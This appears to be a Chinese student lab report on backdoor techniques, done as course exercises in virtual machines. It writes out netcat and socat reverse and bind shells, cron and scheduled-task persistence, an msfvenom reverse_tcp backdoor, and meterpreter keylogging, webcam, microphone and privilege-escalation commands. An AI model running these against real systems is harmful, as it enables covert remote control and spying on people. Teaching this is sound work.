Exp2 后门原理与实践

任务一:使用netcat获取主机操作Shell,cron启动

1.windows获取linux shell

1.1 ipconfig  查看本机查看以太网适配器(8)的ipv4地址

1.2windows:  ncat.exe -l -p   调用ncat.exe程序来蹲守本机的4325端口

1.3  nc –e /bin/sh  在Kali环境下,使用nc指令的-e参数反向连接Windows主机的4325端口:

2.linux获得windows shell

2.1 Kali :  ifconfig 命令查看IP

2.2  kali: nc –l –p  使用nc指令蹲守4325端口。

2.3 Windows: ncat.exe –e cmd.exe  调用ncat.exe程序并用-e参数反向连接Kali主机的4325端口。

3. 使用nc传输数据

3.1 ncat.exe –l  Windows下蹲守4325端口

3.2  nc  建立连接

3.3 之后就可以传输数据了,在kali上打字,windows主机屏幕上也会显示你打的内容。

4. 使用netcat获取主机操作Shell,cron启动

4.1 windows: ncat.exe -l -p  监听本地4325端口

4.2crontab -e编辑一条定时任务,选择编辑器时选择基本的vim编辑器就行(3号)。

点i进行编辑,在最后一行编辑 * * * * /bin/netcat -e /bin/sh  ( :wq 保存退出),这里我选择的是每小时的第三分钟。

4.3 等到了10:03分的时候就可以在windows中查看了。

任务二:使用socat获取主机操作Shell, 任务计划启动

2.1在Windows系统下,打开:控制面板->系统和安全->管理工具->任务计划程序,在操作选项(菜单栏)中,选择“创建任务”。

  • 名称:20164325

  • 新建触发器,选择开始任务时间为:工作站锁定时。

  • 新建操作,选择启动的程序为 socat.exe ,参数项填为  tcp-listen: exec:cmd.exe,pty,stderr  ,含义为:把cmd.exe绑定到端口号,同时把cmd.exe的stderr重定向到stdout上

  • 运行任务

2.2在kali终端输入指令  socat - tcp:

注意:之前的任务我都是用的以太网适配器vmware network adapter vmnet1 在之前的任务中都可以成功,就是这个任务会出现问题,问了同学才知道,要用以太网适配器vmware network adapter vmnet8的ipv4,解决的问题。

任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

3.1Kali:  msfvenom -p windows/meterpreter/reverse_tcp LHOST= -f exe > 20164325_backdoor.exe ,注意这里的IP地址为控制端IP,即在kali上查的IP,可见已经生成了后门程序“ 20164325_backdoor.exe ”

3.2Windows: ncat.exe -lv > 20164325_backdoor.exe ,这样被控主机就进入了接收文件模式,开始传输中的时候是只有前两行,下面是连接上了,文件传输成功的截图

3.3在kali中执行 nc < 20164325_backdoor.exe ,注意这里的IP为被控主机IP,即WindowsIP (ps:这里我出现了问题,所以我就把三个可用的ipv4地址都试了一下,结果是无线局域网的可以使用)

在Kali上使用 msfconsole 指令进入msf控制台

  • use exploit/multi/handler 使用监听模块,设置payload
  • set payload windows/meterpreter/reverse_tcp ,使用和生成后门程序时相同的payload
  • set LHOST 192.168.113.133 ,这里用的是kali IP,和生成后门程序时指定的IP相同
  • ,同样要使用相同的端口

3.5设置完成后,执行监听

(我是双击的后门文件,来开启的)以下是监听结果,开启后门文件之前就只有前一行。

任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

4.1目标主机音频

使用 record_mic 指令可以截获一段音频,可以用 -d 选项设置录制时间

4.2摄像头

webcam_snap 指令可以使用摄像头进行偷拍

webcam stream 指令可以使用摄像头进行录像

4.3击键记录

keyscan_start 指令开始记录下击键的过程

keyscan_dump 指令读取击键的记录

(第一行我实在命令行中输入的指令,随便输入的;第二行就是在word里面输入的,后面的一些东西是我按的空格)

4.4提权

getuid 指令查看当前用户

getsystem 指令进行提权

4.5截屏

screenshot 指令可以进行截屏,效果如下:

五.实验总结与体会

这次实验我吸取了上次实验的教训,对虚拟机的操作更加的顺利,但是我在ip地址的部分出了很多问题,第一次实在任务三的时候;会出现攻击者的ip和被攻击者的ip混的情况,这也是没有清楚原理的表现,这种情况就是刚开始做的时候会出现,但是之后就不会出现这种问题了;还有一个问题,就是要随时检查windows的ip和kali的ip,避免实验出现问题。做任务四的时候真的感受到了恐怖,之后一定会对自己的电脑做好防护。

六.基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

答:这个实验中的后门就是运行一个程序,双击就能开启后门,让人监听;所以我觉得它可能无处不在,会在软件里双击打开,或者安装时就会出现;我觉得还会在网页中打开吧,比如说有一个链接,就会连着后门文件;应该也会潜在下载的文件啊啥的,能打开的东西上。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

答:伪装吧,让计算机中的防火墙和杀毒软件不会直把它灭掉,以为是什么其他的安全软件;我觉得还可能是更改被攻击主机的什么设置,让主机找不到这个后门。

像实验中所说的:Linux可以使用cron启动,Windows下通过任务计划来启动后门程序。

(3)Meterpreter有哪些给你映像深刻的功能?

答:获取摄像头权限进行拍照和视频,录音,提升用户权限等等都很恐怖深刻。

(4)如何发现自己有系统有没有被安装后门?

答:杀毒软件等等的那种防护检查漏洞的软件,来检查是否安装后门。

Exp2 后门原理与实践-------20164325王晓蕊的更多相关文章

  1. Exp3 免杀原理与实践 ——20164325王晓蕊

    一.实践基本内容 1.实践目标 (1) 正确使用msf编码器(√),msfvenom生成如jar之类的其他文件(√),veil-evasion(√),加壳工具(√),使用shellcode编程(√) ...

  2. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  3. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  4. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  5. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  6. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  7. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

  8. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

  9. 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...

随机推荐

  1. 【JAVA】JAVAで各DBに接続する方法(JDBC)の纏め(未完結)

    ■目録 ■ソース ①SQLite3 package cn.com.sy; import java.sql.Connection; import java.sql.DriverManager; impo ...

  2. Ubuntu---grep

    摘要:我们已经学过正则表达式了,所以现在开始学习 grep 也是水到渠成的事情. 简介:grep 是 Linux 中最常用的“文本处理工具”之一,grep 与 sed.awk 合称为 Linux 中的 ...

  3. POJ-1860.CurrencyExchange(Spfa判断负环模版题)

    本题思路:每完成一次交换之后交换余额多于原钱数则存在正环,输出YES即可. 参考代码: #include <cstdio> #include <cstring> #includ ...

  4. mongocxx-driver编译安装

    1. 确保安装epel yum install -y epel-release 2. 按照<CentOS7.2部署node-mapnik>一文中的步骤,手动安装 gcc-6.2.0 和 b ...

  5. VS2015一新建项目就出现未将对象引用设置到对象的实例怎么办?[z]

    https://blog.csdn.net/tiandyoin/article/details/79722800 在控制面板-卸载或修复程序太麻烦,而且不一定保证解决,可以这样------打开--C: ...

  6. 将Windows系统移到另一个硬盘

    原先的128GB SSD,给Windows用是够了,最近虚拟机用得多,靠以前的SSD外挂着用,实在有点不爽,就入手一个256GB的,重装系统是个令人头疼的事情,当然不能干.想起来以前另一个机器操作的时 ...

  7. MySQL:缓存算什么东西?!

    原创: 码农翻身刘欣 十年前,我们还是一个企业内部的应用,用户不多,数据也不多. Tomcat一天也处理不了多少请求,闲得无聊的时候只能和我聊天,这是没有办法的事情,因为整个系统只有我们两个: 没错, ...

  8. 使用Snappy将html或者url转成PDF文件

    这是一个操作简单的html文件或者url转PDF的php库 Github地址 https://github.com/KnpLabs/snappy 安装: $ composer require knpl ...

  9. EasyPR源码剖析(9):字符识别

    在上一篇文章的介绍中,我们已经通过相应的字符分割方法,将车牌区域进行分割,得到7个分割字符图块,接下来要做的就是将字符图块放入训练好的神经网络模型,通过模型来预测每个图块所表示的具体字符.神经网络的介 ...

  10. appnium启动报错Encountered internal error running command: Error: Error occured while starting App. Original error: Permission to start activity denied.

    说明写错了activity 首先查看一下activity,使用命令 打开被测app,输入命令adb shell dumpsys window | findstr mCurrentFocus 看似这个a ...